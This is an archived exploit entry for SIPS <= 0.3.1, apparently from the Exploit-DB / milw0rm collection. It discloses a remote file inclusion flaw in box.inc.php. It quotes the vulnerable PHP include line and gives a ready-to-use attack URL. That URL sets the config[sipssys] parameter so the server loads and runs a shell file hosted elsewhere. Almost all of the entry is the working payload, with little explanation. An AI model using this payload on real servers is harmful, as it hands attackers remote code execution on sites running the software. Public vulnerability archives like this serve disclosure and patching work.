SIPS <= 0.3.1 box.inc.php Remote File Include Vulnerability

2007-02-01T00:00:00
ID EDB-ID:3245
Type exploitdb
Reporter ajann
Modified 2007-02-01T00:00:00

Description

SIPS <= 0.3.1 (box.inc.php) Remote File Include Vulnerability. Webapps exploit for php platform

                                        
                                            *******************************************************************************
# Title   :  SIPS &lt;= 0.3.1(box.inc.php) Remote File Include Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://sourceforge.net/projects/sips/
# $$      :  Free

*******************************************************************************
[[ERROR]]]
..
...
.....
&lt;?
include $config["sipssys"] ."/code/rssparser.inc.php";
?&gt;
..
...
.....

[[ERROR]]]


[[RFI]]]

http://[target]/[path]/sipssys/code/box.inc.php?config[sipssys]=[SHELL]

Example:

/sipssys/code/box.inc.php?config[sipssys]=http://[target]/[path]/shell.x

[[/RFI]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-02-01]